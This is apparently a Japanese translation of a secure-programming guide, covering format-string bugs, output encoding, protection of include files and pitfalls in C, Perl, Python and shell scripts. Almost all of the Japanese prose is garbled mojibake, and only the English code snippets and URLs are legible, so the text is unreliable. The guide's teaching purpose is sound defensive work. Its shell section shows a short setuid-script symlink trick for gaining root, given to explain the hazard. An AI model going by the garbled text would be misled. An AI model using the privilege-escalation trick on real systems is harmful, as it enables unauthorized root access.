閧ɂ́AFDȖڂ猩Ȃ悤ɂׂłB͂ł
Ăo͂łĂAVXeɕۑĂ鎞ɂׂ͂łB
ɂɂ́ANWbgJ[h̔ԍ⒙̎cȀZ
K܂܂܂B܂AAvP[V͖Odq[̃AhX
vCx[gȏ񈵂Ă܂B 

Web x[X̃AvP[V́A[UƂ̒ʐMɔ閧ɂ񂪂
ȂAׂĈÍKv܂Bʂ́AuhttpsvvgR(HTTP
 SSL  TLS ɂ̂Ă)g܂B HTTP 1.1 ̋Ki(IETF RFC 2616
ZNV 15.1.3)ɂ΁AHTTP vgRgăT[rX񋟂Ă
钘҂́AGET x[XɂtH[閧ɂf[^̓o^Ɏgp
ׂł͂ȂƂĂ܂BƁÃf[^NGXg URI 
ēĂ܂łB̃T[ovNVA[ŨG[
WFg̑́ANGXg URI ǂɋL^A̋L^O
猩Ă܂܂B GET ̂ɁA̖ړIɌĂ
POST x[Xœo^gĂB 

閧̃f[^f[^x[Xł́ALu(fBXÑt@C
) ÍĂׂłB̂悤ȈÍĂAU҂S
KvȃAvP[Vj󂷂sׂh܂񂵁ARȂAvP
[V́AÍf[^ɃANZX鉽炩̎ipӂȂ
Ȃ܂BAf[^obNAbvp̃fBXNǂɂ
悤ƂU҂ɑ΂ẮAhɂȂ܂Bf[^̕Ɏgp
錮𓾂悤ƂUɑ΂ẮAʂ܂B܂AU҂Av
P[Vɂ܂܂ƐNłȂΖhɂȂ܂BA֘A
VXëꕔɐNł΁AۊǂĂf[^̂ɂ͏\
B̏ꍇAU҂͈ÍASYjȂ΁Af[^擾
ł܂Bf[^spӂɈړĂ܂P[X񂠂܂(
 core t@C) Ah܂BڂׂȂ̂́Av
قǂꂪ͂Ȗhɂ͂ȂȂ_łBT[ogĂ܂\
邩łB

 

Chapter 8. ͂肷ătB[hobN

                                    ҂ɂ̖͂mɂӂ킵 
                                    ȂȂނɎ҂ƂȂ 
                                    ߂ɁB                           
                                                                       
                                                񐹏⼌ 26  4 
 

8.1. tB[hobN͍ŏ

MłȂ[Uɑ΂ẮȀ񋟂Ȃ悤ɂĂ
BAsāAsĂsƌɂ
āAȂsɂẮAł邾Ȃ悤ɂĂB
ׂȏ̓[U̍Ղ؂OɕۑĂBƂ΁A

 E vOɉ炩̃[UF؂Kvȏꍇ(Ƃ΃lbg[NT[
    o⃍OCEvO쐬Ă)AFؑO̒iKł́A[U
    ͂ł邾^Ȃ悤ɂĂBɔFؑOɃvO
    ̃o[Wio[R炷ƂȂ悤ɂĂB
    ȂƁÃo[W̃vOɌ邱Ƃ킩Ă܂
    ꍇÃo[WAbvO[hȂ[UU҂ɂ݂
    ݂Ă܂ƂɂȂĂ܂܂B
   
 E vOpX[hvꍇA͂\Ă͂܂B
    pX[h΂錴 1 ɂȂĂ܂܂B
   
 

 

8.2. Rg͂Ȃ

Ԃɂ́A󂯎郆[UɃRgĂ悢Ɩ]
Ȃ́AuRgvĂ͂܂Bt@C(HTML ̂悤)
쐬 Web AvP[Vɂ̖͌łB Web AvP[V
̃vO}́A̍iɃRgꂽ(͗ǂƂ
)܂AR[hɂRgcłȂA쐬t@C (
ʂ HTML  XML)̈ꕔƂĊ܂߂܂Bꂪ[UɕԂ܂B̃R
gɂ̃VXeǂ̂悤ɓ삵Ă邩i񋟂
AU҂邱ƂɂȂ܂B

 

8.3. o͂ꂽAxꍇΏ

S߂vOŁA[U֏o͂ߒl܂点Ao
̔x邱ƂA[UɂƂĉ\܂BƂ
΁AWeb uEU͌̈ӂ TCP/IP ̌oHؒfAxx
ł܂B̂悤ȃP[Xɑ΂ĂAS߂vO͑
ׂłBɃbN݂͂₩ɊO悤ɂׂł(łΔ
ԂO)B΁AT[rXۍǓł悤ȂƂ͂
Blbg[Nւ̏ݗv́AɃ^CAEgݒ肷ׂł
B 

 

8.4. f[^tH[}bg𐧌䂷(uv)

Rs[^ɂo̓[`́A𐧌䂷p^
P[X܂B C ōł悭mꂽႪ printf()ñ[`
(printf() sprintf()A snprintf()Afprintf())łB C ł̗̑
syslog()(VXẽO) setproctitle() (vZXʎq̏
𕶎ŕ\̂Ɏgp)łB֐ɕtÓAuerrvuwarnv
ł͂܂Aulogv܂܂ĂAuprintfvŏI肵Ă
_ɒӂ鉿l͂܂B Python ́u%vZqĂāA
Ə𓯂悤ɐ䂵܂BvO⃉Cȗ́AtH
[}bg@\`ĂāAʂ͑gݍ݃[`ĂяoAɏ
܂(Ƃ΁Aglib  g_snprintf()[`̂悤)B

ӊOɂÃtH[}bg@\тĂ悤ɎvX
񂢂āAMłȂ[Ũf[^Ap^Ƃėp
Ă܂BtB^邱ƂȂɂ́AMłȂ[Ũf[^
p^ƂĎgpȂłBƂĂ҂Ȃ̂L
B

  /* Wrong ways: */                                                    
  printf(string_from_untrusted_user);                                  
  /* Right ways: */                                                    
  printf("%s", string_from_untrusted_user); /* safe */                 
  fputs(string_from_untrusted_user); /* better for simple strings */   

Ȃ΁AU҂͏TdɑIŁAƂ鈫s
܂B C  printf() ǂłB printf()gāA[U䂵
Ă鏑p@͂񂠂܂B̕@ɂ́A
ɂobt@I[o[(U҂vOSɃRg
[łĂ܂܂)F߂ĂȂp^gpϊK(\
zÕf[^})A܂\złȂʂɂȂl肾tH
[}bg܂(sK؂ȃf[^OɓāAŗp鎞ɖ
N)BɂЂǂP[X́Aprintf  %n ̕ϊKłB̋K
́Aʂ̕|C^ɂ邾݂܂BgƁAU
҂͏Ƃlɏ㏑łĂ܂܂B܂AU҂͂قƂ
Cӂ̏ꏊɏ㏑\łB͖{͓nȂup^v
wł邩łB̍Uɂďڂ_͂
܂BƂ΁A Avoiding security holes when developing an
application - Part 4: format strings <http://www-syntim.inria.fr/
fractales/Staff/Raynal/LinuxMag/SecProg/Art4/index.html>  1 
B

ʂ[UɕԂP[X̂ŁA̍U̓X^bNɂĂ̓
炷ꍇɂg܂B̏́AStackGuard ̂悤ȃX^bN
VXêɂpł܂BStackGuard ͒萔́ucanaryv
lpčUm܂BX^bN̓e\łȂA
 canary ̒l炳āAU󂯂₷Ȃ܂B

́AقƂǂ萔̂͂łAۉo
֐Ăяo(Ƃ΁Agettext  _())܂ނƂ܂B̌
sɂ́AvO䂷lɐ݂Ȃ΂Ȃ܂B܂
[ÚAvOǗĂ郁bZ[Wt@C炵Ił
悤ɂȂ΂܂B[Ũf[^ɂ́AgpOɃtB^
܂(ƂĐAƂ [A-Za-z0-9] ̂悤ȕ
XgAbvătB^݌v܂)BAĥɁA
͂ƊȒPŗǂ@܂B́AŒ肷邩Afputs
()gp邩łBɁuóv̖ƂăXgAbv܂A
Iɏo͈ȑÕvOɑ΂Ă肪܂(o̓[`̓t@
CɕۑĂ邩ꂸA snprintf()gāAIȏԂ̐
Ă邩Ȃł)B

̓tH[}bg̖ɂāAZLeB̖肪̂́A
ȂȂƂ܂BCERT Advisory CA-2000-13 ΁A̎_
pU̗ႪڂĂ܂B̖肪ɂ₷̂
āAɏڂ́A Pascal Bouchareine ̓dq[ŁA^C
gu[Paper] Format bugsvɂ܂Bꂪꂽ̂ 2000 N 7
 18 ł Bugtraq <http://www.securityfocus.com>B 2000 N 12 
Agcc RpC̊Jłł́ASłȂɑ΂Ă̌xbZ
[WT|[gĂ܂BJ҂̖ł悤Ɏx
鎎݂łB

񂱂͍ۉ̌ۂ̂ƂSǂAƂ^͂
炩Ă܂Bōۉ̌[`쐬ĂȂAMł
Ȃ[Uɂ́AJ[w\ŁAȃpXw肷
ȁAႤ̂włȂ悤ɂĂB

Mł鑊ɑ΂̂łĂAۉɂčꂽɂ
Ȃ΂܂B͖łBȂƁAU҂͂
̋@\𗘗pď̎_ɓ˂݂܂B C  C++ ̃v
OɌłB̓_ Bugtraq ŘbɂȂĂ܂(Ƃ΁A
John Levon  2000 N 7  26  Bugtraq ɓêĂ
)BȂ́A[UɋÍA̒lɂ邱
Ƃ_ Section 4.7.3 ĂB

vO~ÕoOłƂ͂A낢ȍXł܂܂ȕ@
\LĂ_ɐĜ͈Ӗ܂BɃsIh(.)ƃJ}
(,)Aƒ[؂̂ɎgĂ_ɑ΂āBf[^ۑ
Aǂݍ񂾂肷ȂAgp̃J[f[^̎舵ɐΊ
Ȃ悤ɂȂ΂Ȃ܂BȂ΁AtXꃆ[U
pꃆ[Uƃf[^łȂ܂BŔAۑꂽA
o肵f[^͈Ⴄ؂gĂ邩ȂłBZ
LeB̖ƂĂꂪp̂ǂ͒肩ł͂܂
AȂƂv܂B

 

8.5. o͎ɕ𐧌䂷

ʓIɁASKvȃvOł́ÃvO߂O
NCAgĂȂ΂܂B悭 1 ƂāA
o͂ۂɕwsȂƁAWeb AvP[VɎxႪ
ł_܂BׂẴf[^Mł錳炭ꍇ͂܂
܂BAMłȂf[^ȂAMłȂ
SKvȃvO̗\łȂʂ̕gāAf[^U邩
܂BꂪTCgɂ܂鈫ӂÛɂȂ܂B
ڂ́A Section 4.9 ĂB

CERT's tech tip on malicious code mitigation <http://www.cert.org/
tech_tips/malicious_code_mitigation.html> ł̕w肵Ȃ
ɂĂȂ킩₷Ă܂̂ŁAňp܂B

   
    Web y[W̒ɂ́A(HTTP ́ucharsetvp^)`
    ĂȂƂ낪񂠂܂B HTML  HTTP ̏o[W
    ́A`ĂȂƁAftHg ISO-8859-1 ł
    Ɖ肵Ă܂BۂɁAuEŨftHg͂܂܂
    ŁAftHg ISO-8859-1 ƂĂ܂̂ɂ͖܂B
    HTML version 4 ł́Aw肵ĂȂ΁Aǂ̕g
    Ă܂ȂƂɂȂ܂B
   
    Web T[oǂ̕ĝw肵ĂȂƁAǂ̕
    ꕶȂ̂킩܂Bw肵ĂȂ Web y[W
    AĂ̏ꍇ܂삵܂B͕ŴقƂǂA128
    ȉ̃oCglɓ蓖ĂĂ邩łBA128 ȏ
    ̒l̂ǂꂪꕶȂ̂ł傤B 16 rbg̕ɂ
    Au<v̂悤ȓꕶ\̂ɁAǉŕoCggĂ
    ̂܂BuEUɂ́Aʂ̕ƂĔFA삷
    ̂܂B́uvȂ̂łAӂXNv
    ggUAhÂ炭ȂĂ܂Ă܂BT[o͂ǂ̃oC
    gV[PXꕶ̂APɂ͔fłȂȂ܂B
   
    Ƃ΁AUTF-7 ́u<vƁu>vɑ΂āAقȂ镄񋟂Ă
    B܂悭gĂuEÛ́A^O̊Jn
    IƂĔF̂܂B̓uEŨoOł͂܂
    B{ UTF-7 ȂA͐łB́Au
    EUƃT[oœƂĂȂ󋵂Ɋׂ\_
    łB
   
̖͖̂łALƂɁAHTML ł̉͊ȒP
łB HTML wb_ɕZbgL̗̂悤ɐݒ肷邾łB

<HTML>                                                                 
<HEAD>                                                                 
<META http-equiv="Content-Type"                                        
content="text/html; charset=ISO-8859-1">                               
<TITLE>HTML SAMPLE</TITLE>                                             
</HEAD>                                                                
<BODY>                                                                 
<P>This is a sample HTML page                                          
</BODY>                                                                
</HTML>                                                                

 

ZpIȊϓ_炷ƁA HTTP vgȐo͂̈ꕔƂ
ݒ肷AɗǂłBAĂ郉Cu
݂܂B̉͋ZpIɂ͗DĂ܂BNCAgɋ
IɃwb_[𒲂ׂAwb_[ɂMETA ǂł킩镶
𔻒肷KvȂłBAIɂ͏L̂悤 META
ǂ߂ȂAȂ肷uEÚAsł͎
Ă܂B͕ʖłBɂĂAT[o
HTTP vgR̈ꕔƂāuZbgvɓK؂Ȓlݒ肵đoK
v܂BcOȂA(ZpIɂ͗Dꂽ)@S炨E
ł܂B́AÂ HTTP/1.0 Ή̃NCAgɂ́AIɎw
Ă charset p^K؂ɈȂ̂邩łB HTTP/1.1
̎dlł́ANCAg̃p^ɏ]悤ɒ߂Ă܂A
̂́A͂͂Ȃ͂^킵Ǝv܂B炭A
̗piƂāA̎dlB̕@ƂĂł͂ȂAǉ
̕@ƂĎgƂɂȂł傤B

 

8.6. Include t@Cݒt@Cւ̃ANZXh

Web x[X̃AvP[VJ鎞ɁA[UɃvO
include t@Cݒt@Cւ̃ANZX(ǂݍ)F߂Ă͂܂
B̃f[^́AVXeɐN̂ɏ\ȏ(Ƃ΁ApX[
h)񋟂邩܂B̃KChĆAP[Xɂđ̎
̃AvP[VɂKpł邱ƂoĂĂB̃KCh
CŝɁAKvȍƂ܂B

 E vO include t@C͂̐ݒt@ĆAWeb ̃hL
    g[gOɒuĂ(܂AWeb T[o͂̃t@C
    ΊOɏo܂)B
   
 E include t@CeLXgt@CƂĊOɏoȂ悤ɁAWeb
    T[oݒ肵ĂBƂ΁AApache gĂȂA.inc
    t@CpɃnhANVǉł܂B
   
 E include t@C͕ی삳ꂽfBNg(.htaccess g) ɒu
    ĂB̏ŁAOɏoȂt@CƂĐݒ肵ĂB
   
 E t@Cɑ΂ătB^găANZXۂ悤ɂĂ
    B Apache ȂALŎł܂B
   
     <Files ~ "\.phpincludes">                                  
        Order allow,deny                                        
        Deny from all                                           
     </Files>                                                   
   
    K\tɊpăt@C}b`KvȂA
    Apache ł FilesMatch ߂gΎł܂B
   
 E include t@CK̃XNvgŁAT[o͂ȂA
    [UnĂp^ł͐Γ삵Ȃ悤ɂĂB
    킹ĕKSɐ݌vĂB
   
̉@ł́At@CuĂfBNgNǂ߂
A[ŨANZXhł܂Bt@C̃p[~bVύX
āAWeb T[o uid  gid Ă҂ǂ߂悤ɂ
B[U Web T[oŎ̃XNvgsł([
Ut@CɃANZXXNvg)̂ȂA̕@ł͂܂
܂BATCgzXeBOĂT[oMłȂ
lԂƋLȂ΁AVXeSɂ͍̂łB@ 1 ́A
Web T[rX񋟂vO𕡐グAꂼp[~bV
ʂɂ邱ƂłB̕@łɈSɂ͂Ȃ܂Aۍ܂
ƂłB܂ʂ̉@ƂāA uid  gid Ώۃt@C
ǂ߂悤ɐݒ肵AT[õXNvguṽp[~bV
Ŏs悤ɂ܂B҂̕@͂ꎩg肪܂BT[ô
镔 root ̌KvƂȂ邩łBȂƁAXNvgɕKv
ȏ̃p[~bVKvƂȂ邩܂B

 

Chapter 9. ŗL̖

                                    ɂ͂낢Ȏނ̌tA 
                                    ǂӖȂ̂͂ 
                                    B                             
                                                                       
                                    V񐹏Rg̐Mkւ̎莆 14
                                                               10 )

ɂ͌ŗL̖肪񂠂܂BLɂ̖̑v񂵂ċ
Ă܂B

 E ֘AxƎۂɗpłh@\ׂėLɂĂB
    RpCł́ARpCƎs̗ΏۂɂȂ܂B
    ʓIɃZLeBɊ֘AĂvOł́AxׂėL
    āAƃRpCׂłB
   
 E uZ[tE[hv(܂Asɐ郂[h)p
    łȂAĂBC^v^̑́Â悤
    [hpӂĂ܂BʓIɁAZ[tE[hɗāAꂾ
    ŖhsĂ͂܂BZ[tE[hĂ錾̑啔
    ́ÃZLeB\ɕ͂ĂƂ͌܂BȂ
    ƁA_Ă܂܂ȎioĂ܂̂ʗłB
    R[hɓẮAR[hZ[tE[hgȂĂ
    Sł悤ɂAɃZ[tE[hāAŏIIɂ͉d
    h悤ɂ܂(AU҂̓AvP[ṼR[
    hƃZ[tE[h҂󂳂Ȃ΂ȂȂȂ܂)B 
   
 E Ɋ܂܂Ă댯ŌÏL͔ĂBu댯vƂ́A
    𐳂ŝ̂w܂BƂ΁Ȃɂ
    usvcȁv@\@\܂B܂Auv𐄑
    As낵Ďgp̂łBʓIɂׂ͔͂łB
    U҂s낵Ăɂ݁A\łȂ댯ȂƂ
    邩ȂłB悭NG[ɁAuItEoCE
    (off-by-one)vG[܂B́AEl 1 邱ƂŁA
    ʓIɃG[ƂȂƎ㐫łBʁAItEoCEG[̔
    ŏɂȂ悤ɃR[hĂBɕWK񂪂
    (Ƃ΁A[v̏)Aɏ]ĂB
   
 E ̊ՂƂȂ镔(Ƃ΁A^CECu)płA
    ꂪSł邩mFĂB
   
 E ̃K[xWERNVIɍsɂāA@f[
    ^(ɔ閧pX[h)Tdɂ폜ĂB
   
 E gpĂ鑀@𐳊mɗĂĂBhL
    gɂ鑀@ꂼ𒲂ׂĂB֘A\Ȃ
    mFłȂAԂl͖ȂłBusignedv̒lƁu
    unsignedv̒l̈Ⴂ𖳎ȂłBOT|[gĂ
     C ̂悤Ȍł͓ɍłA@͂܂B
   
 

9.1. C  C++

C  C++ vOɑ݂ő̃ZLeB̖ 1 ́Aob
t@I[o[t[łBڂ Chapter 5 ĂB C ͂
OT|[gĂȂƂ_ĂāAdȃG[𖳎
AɃvOR[fBOł܂B

C  C++ ɂ͑ɂ肪܂B́AJ҂ŃǗ
Ȃ΂ȂȂ_ł(Ƃ΁Amalloc() alloc()Afree()AnewAfree)
BǗɎsƁAʂƂăZLeB̎_ɂȂ邩
܂BƐ[Ȗ́AvOJĂ͂ȂԈ
ĊJł_ł(܂AC++  malloc()  new ߂Ďg
AsȖ߂𗘗pĂ邱ƂɂȂ܂)BȂƁAꍇɂĂ
GNU/Linux VXê悤ɁANbVP[X܂B܂
P[Xł͍U҂ɂŁAɃR[hsĂ܂
܂BƂ΁A2001 N 3  11  zlib Cuł̖
ĂƃAiEXAgĂ鑽̃vOe
󂯂܂BāAGNU/Linux ŃvOeXg鎞ɂ́A
MALLOC_CHECK_ ϐ 1  2 ݒ肷ׂłBāA
vOŝɓẮA0A1A2 ꂩɐݒ肷̂
Ă悢Ǝv܂B̐ݒ闝RɂẮAGNU/Linux  malloc
(3) ɐ܂B

   
    ŋ߂̃o[W Linux libc(5.4.23 ȍ~) GNU libc(2.x)ł́A
    malloc ̓삪AϐɂĒłɂȂĂ܂B
    MALLOC_CHECK_ ݒ肳ĂƁAp()p
    APȃG[ɂ͑ς悤ɂȂ܂BPȃG[Ƃ́Afree
    ()𓯂 2 xĂяoĂ܂A 1 oCg]vɎ
    (ItEoCẼoO)铙łBÃG[
    Ăh킯ł͂ȂȀꍇɂ̓[N܂B
    MALLOC_CHECK_  0 ɐݒ肷ƁAq[v̔jɑ΂Čxo
    Â܂܂ɂĂ܂B1 ɐݒ肷ƁAffbZ[WWG
    [o͂ɕ\܂B 2 ɐݒ肷ƁA abort() Ăяo
    ܂BvZXۂɃNbV̂ƌɂȂANbV
    _Ŗ{̌Tôɍȏꍇɂ́Aꂪ
    ܂B 
   
gp̃JȂ(Ƃ΁Afree()g)Agp̃
܂Ă܂܂Bgp̃܂߂ƁAvO
~Ă܂܂Bgp̃U҂ɗpAT[r
XۂNʂɂȂ\܂Bł́AU҂
tOgāAT[rXۂN܂Bʂ͂Ȃ
IŁAUƂĂ͊댯ႭȂ܂B

^錾鎞ɂ͂ł邾ɂĂBpłȂuenumv
gāA񋓌^̒l`Ă(ʂȒlucharvuint
vĝł͂Ȃ)B enum ͓ switch ̒lŖɗ܂BRpC
AlKpĂ邩ǂ𔻒肵Ă܂BlɂȂ
΁Auunsignedvgp̂K؂łB

C  C++ łȂ̂́A^łucharv signed 
unsigned ǂɂȂ_ł(RpC}VɂĈႢ܂)B
signed char ɃnCrbgݒ肵AƂĕۑƕɂȂ܂B
ꂪƎ㐫ɂȂP[X܂BʓIɂ́Achar  signed char ̂
Ɂuunsigned charvgāAobt@|C^ɗpĂB
āA127(0x7f)ȏ̒lɂȂ邩Ȃf[^ȂALX
gĂB

C  C++ ɂ^`FbÑT|[g͖炩ɂłBA
ȂƂ`FbÑxグ΁AԈႢ̂͎IɌmł
܂BRpČxł邾LɂăR[hCAx
oȂ悤ɃRpCĂBK ANSI ̃vg^Cv錾Ɨ
wb_t@C (.h)ɓėpA֐ĂяoׂĂKmȌ^
ɂȂĂ悤ɂĂB gcc g C  C++ RpC
ȂARpC̃tOƂāAȂƂLݒ肵Ă(
̌xbZ[WLɂȂ܂)B܂Axׂ͂Ď菜悤
Ă(xɂ́Af[^t[͂sāAx̍œK}
ɂm̂܂B̏ꍇA-O2 gĂ邱Ƃ
oĂĂ)B

gcc -Wall -Wpointer-arith -Wstrict-prototypes -O2                   

u-W -pedanticvƂĂ悢Ǝv܂B

C  C++ RpCAsȏołP[XX܂
BƂ gcc ł́A__attribute__()@\(C g@\ 1 )gāAs
ȏւ̌x\ɂȂAY֐Ɉ܂B܂A
̋@\gƂĂAR[ȟ͖݊Ȃ܂Bł́Aw
b_t@C(.h)ɉ̗̂Ă܂B

 /* in header.h */                                                     
 #ifndef __GNUC__                                                      
 #  define __attribute__(x) /*nothing*/                                
 #endif                                                                
                                                                       
 extern void logprintf(const char *format, ...)                        
    __attribute__((format(printf,1,2)));                               
 extern void logprintva(const char *format, va_list args)              
    __attribute__((format(printf,1,0)));                               

uformatv́AuprintfvƁuscanfvŗpł܂B̌ɑ
͏̃p^ƍŏ̉ψp^(X)łB̓_
ẮAGNU ̃hLgŉ₷Ă܂B̋@\Ƃ
A__attribute__ ɂ́unoreturnvuconstv܂B

C  C++ ̊J҂悭NG[𖳂܂傤BƂ΁Au==v
gŁu=vgȂ悤AӂĂB

 

9.2. Perl

Perl vO}́A܂ perlsec(1)ǂ񂾕ǂł傤B man 
͈S߂ Perl vȌɊւāAۑ肪ڂ
Ă܂B perlsec(1)ł́Au(taint)v[hɂĐĂ
܂BSKvȃvÓÃ[hgpׂłB
͎[U id O[v id Ă΁AIɉ[hL
ɂȂ܂B́A-T R}hCɎw肵ėLɂł܂(
 CGI XNvĝ悤ɁAN̑ɎsȂA҂gĂ
)B[h́A܂܂ȃ`FbNLɂ܂BƂ΁AfB
Ng̃pX̃`FbNāÃ[U߂Ȃ悤ɂȂĂ
邩`FbN܂B

A[ȟʂł͂茻̂́AăvOO
ɉe^Ă܂Ȃ悤ɁAvOO炭f[^g
ȂǂꍇłB[hł́AO瓾͂́uꂽv
̂ƂĈ󂪕t܂BO̓͂ɂ́AR}hC̈
ϐAJ[(perllocale(1) Q)AVXeR[̌
(readdir  readlinkAgetpw*  gecos tB[ȟďo)At@C
ׂĂɊY܂Bꂽf[^͒ڗp܂B܂A
ԐړIɃTuVFĂяoR}hp܂Bt@CfB
NgAvZXCR}hłp܂BdvȗO 1 
܂BXg system  exec ɓnꍇAXgvfɂ͉
x`FbN܂BāA[hł system  exec 
͓ɒӂ𕥂ĂB

ꂽf[^hf[^l͂ǂĂ܂BO 1 
܂Bf[^ꂢɂ́Aꂽf[^̕𔲂o
܂BAƂĂނ݂Ɂu.*vgȂ悤ɂĂ
Bhdg݂䖳ɂĂ܂܂B̂ɁAvO
euSȁvp^ʂp^gāAuLȁvlo
ĉBloA̒l`FbNKv܂(
)B

open  globAbacktick ֐̓VFĂŁAt@CɊ܂܂郏C
hJ[hWJ܂BꂪZLeBz[Ĵɂ悭g
܂B̊֐܂~߂悤ɂ邩Aperlsec(1)ɂ悤
ɁAȂuTh{bNXvgp悤ɂĂ
B backtick ɂẮAsystem()Ăяo悤ɏĂ
(͊SɏāASȂ̂ɕύXĂ)B

Ɍ΁APerl  open()֐́AS߂vOɂƂ
́ułȂ̂ȁHvԂłBopen()̓eLXg߂܂AO
ɃtB^ȂƁAZLeB̖肪NĂ
܂Bt@CI[vAbN肷R[hOɁA
perlopentut(1) 𒲂ׂĂBĂ̏ꍇAsysopen()̓t@C
I[vɓāAɈSȕ@ (ɕGł)񋟂Ă
܂BV Perl 5.6 ł́Aopen() ̌Ăяoɂ 3 ̃p^
pӂāA sysopen()̕GrAɂ𖳌ɂ܂B
<http://www.xray.mpe.mpg.de/mailing-lists/perl5-porters/2000-03/
msg02596.html>

Perl vO͌xtO(-w)LɂׂłBŐݓIɊ댯
AÏLɌxo܂B

Perl vÓAł܂Bɏڂ́A
Perl ̕WzzɓĂuSafevW[ĂB̃W
[ǂ̒xčĂ邩肩ł͂܂̂ŁAɃZL
eB̐M񂹂̂͒ӂĂBuPenguin Model for Secure
Distributed Internet ScriptingvڂׂĂ悢ł傤B̃hL
gĂ鎞_ł́A܂R[hhLgpłȂ
łBy󒐁FPenguin Model for Secure Distributed Internet
Scripting  http://www.hpcf.upr.edu/~humberto/documents/
penguin-safe-scripting.html QƂĂz

 

9.3. Python

̌ƓAf[^vÖꕔƂĎsł֐ɂ́A
ӂKvłBMłȂ[UA͂ɉeΗ^Ȃ悤ɂ
B exec()  eval()Aexecfile()ɊY܂(Ɍ
Acompile()ĂяôׂĂɑ΂āAӐ[`FbNׂł)B
ӊOȂƂɁAinput()͊댯ł[Watters 1996, 150]B 

Python vO(setuid  setgid vO)ŁAȂ
[UsAĂvOɂ́Au[UvW[
C|[gĂ͂܂B[UW[̂ŁApythonrc.py 
܂ꂽAsꂽ肵܂B̃t@CMłȂ[URg
[ƁAU҂[UW[𗘗pāAMłvO
ɑ΂āAIɏȃR[hs܂B 

Python ́AقƂǃRpCɃ`FbNs܂B{IɃRpC
Ɍ^݂͑܂B֐⃁\bhɓnp^̐Kł
邩̃`FbN炠܂BꂪAݓIoOAƂ
cOȌʂ𐶂݂܂(John Viega Ǝ́A̖ɑ܂)B
܂΁A̓APython ̓IvVƂĐÓIȌ^tƌ^`Fb
NIł悤ɂȂł傤B̓_ɂĂ͂˂Ăc_
܂B͕sSȂ PyChecker Ƃ􂪂܂B
PyChecker  lint CNȃvOŁAPython ̃\[XR[hɂ悭ł
oO`FbN܂B PyChecker  http://pychecker.sourceforge.net 
擾ł܂B

Python ł RExec NXŁusɐv@\T|[gĂ
܂B̋@\̎ړÍAAvbg⃂oCER[h̎sɂ܂
BAOR[hnȂĂAvO̓ɐ݂
ꍇɂpł܂Bsɐł́At@C̓ǂݍ݂
AftHgŋĂ܂ (݂͋Ă܂)Blbg[N
փANZX鑀 GUI ɂƂ͂ł܂BftHg͕ύX
\łAŁA(loophole)łȂ悤ɒӂ
BɃ[Uɑ΂āARɃNX֑ǉł悤ɂ
ƁAʂ̕@Ŋjł܂BƂ̂́APython ́uȂ
v\bh𑽗ʂɌĂяoĎsĂ邩łBftHgł́A
Python ̃IuWFNg͂قƂǎQƓnłBvO
ɂĂAmutable(ύX\)Ȓlɑ΂QƂꍞނƁA
vOłAxIuWFNgύXł܂B܂萧
̊O猩Ă܂܂B܂ mutable ȒlɃANZXȂA
mutable ȒlRs[邩A Bastion W[(ʃIuWFNgւ̐
T|[g)gpĂBڂ́AKuchling [2000]Ă
B@\Aǂ̒xč{̂͒肩
͂܂̂ŁAvO}̊F͒ӂĂB

 

9.4. VFXNvg(sh  csh n)

setuid  setgid S߂R[hɂ́AWIȃR}h
VF̃XNvg(csh  shAbash ̂悤)̗pȂ悤A
܂BVXeɂ(Linux ̂悤)Asetuid  setgid VFX
NvgSɖɂĂ̂Asetuid  setgid VFX
Nvg쐬ƁAڐA̖肪ɔ܂BÂVXeł
AVFXNvg͈Sł͂܂B͋ԂN
ł(Section 3.1.3 Ř_悤)B̑̃VXeɂƂĂ
A܂ǂƂ͂܂B

ۂ̃P[Xł́AVFXNvgSvvOɎg
ׂł͂Ȃꍇ悭܂BWIȃR}hVF́A܂
͂ɍEĂ܂͎̂m̎łBʃR}hVF́AΘbI
ɗpĂ郆[Uɑ΂āAuIɁv삷悤ɐ݌vĂ܂
BāANbN錈ӂlԂɂ͑΍Rł܂BVFv
ÓASɂKv߂ȂvOɂƂẮAf炵
vOł(Ƃ΁AȂ[UƓŎsł܂
AuMłȂvf[^󂯂܂)B܂Aׂ͂(Ƃ
At@CfBNgAR}hCAϐ)AMł郆[
Û̂łAē삷̂ɂ͍DsłBN
ĨXNvgɔɗǂ̗pĂ̂͂̂߂łB

ӂ݂͂󋵂ŁASȃVFvO쐬̂́A
̌ɔׂčłBŔAVFׂ͂Ăe󂯂邩ł
BƂ΁AuȂvϐ(Ƃ΁AENV  BASH_ENVAIFS ̒l)
A@ɉe܂AXNvgsOɁA[U`
Cӂ̃R[hs邱Ƃ\łBst@CfBNg
ĝ悤Ȃ̂łAsɉe܂BU҂䕶(ƂΉ
s)󔒁AVF̃^LN^A_bV (IvVtO)
͂܂t@CƁAꂪތ^邱ƂɂȂ܂B
Ƃ΁ABourne VF̎̑́AL̃R[hsƁAroot
ł̃ANZXF߂Ă܂܂(̐Ǝ㐫񎦂Ăꂽ NCSA Ɋӂ
܂)B

 % ln -s /usr/bin/setuid-shell /tmp/-x                                 
 % cd /tmp                                                             
 % -x                                                                  

VXeɂĂ͂̌ǂł̂܂A肪
ł͂܂BR}hVF̑啔AS setuid  setgid 
vO悤ɂ͂łĂȂłBvO̖ړIƂāA
setuid VFXNvg̍쐬͔ĂBVXe setuid 
VFXNvgĂĂłB̂ɁAʂ̌ŏȃv
O쐬āANAɂĂA̎s`(VFXNv
gł邩܂)ĂԂ悤ɂ܂傤B

łVFXNvg̗pɂȂAȂƂړ
͕ύXłȂfBNgɃXNvguĂB PATH  IFS 
́AXNvg̍ŏ̕Ŋm̒lݒ肵ĂBہA̓XN
vgĂ΂ȑOɐĂׂłB܂ŏ̕ŁucdvāA
SȃfBNgɈړĂĂBf[^gȂ /etc ̂悤
ȁAMł郆[U䂵ĂfBNg̃f[^ɂĂ
BU҂́Â悤ȃfBNgɁAӂĖtt@C
܂̂ŁBt@Cׂ͂ĕKpň͂ŃR}hC
ɓnĂBƂ΁A$1 ł͂Ȃ "$1" ̂悤ɁBŔA󔒂
t@CĂ܂łBu--vgăR}hĂ
oAIvVɒǉłȂ悤ɂĂBU҂_bV
ł͂܂t@C쐬AnĂ肵āAvOЂ
ăIvVł邩̂Ƃ悤Ƃ邩Ȃł
B̓t@C𒍈Ӑ[ׁAt@Cɂ͐
ĂB

ӖŁASȃ|VĂut̃VF(restricted
shell)vM̂́AE߂ł܂Bt̃VF́Aă
[Uɂ܂܂ȏsłȂ悤ɂVFłBړÍA[U
ɂꂽvO𓮍삳邱ƂłBtVF́AO
ɂ͔OiƂĂ͗LłAmɐݒłȂ̂͗LŁA
肵Ă悭jĂ܂܂BƂΐtVFɂ́At@C(
Ƃ΁Au.profilev)ɐȂԂŎsĂA삷̂
܂B[Ũt@CύXł΁ÃR[hsĂ
܂܂BtVF́Aꂽ̃vOs悤
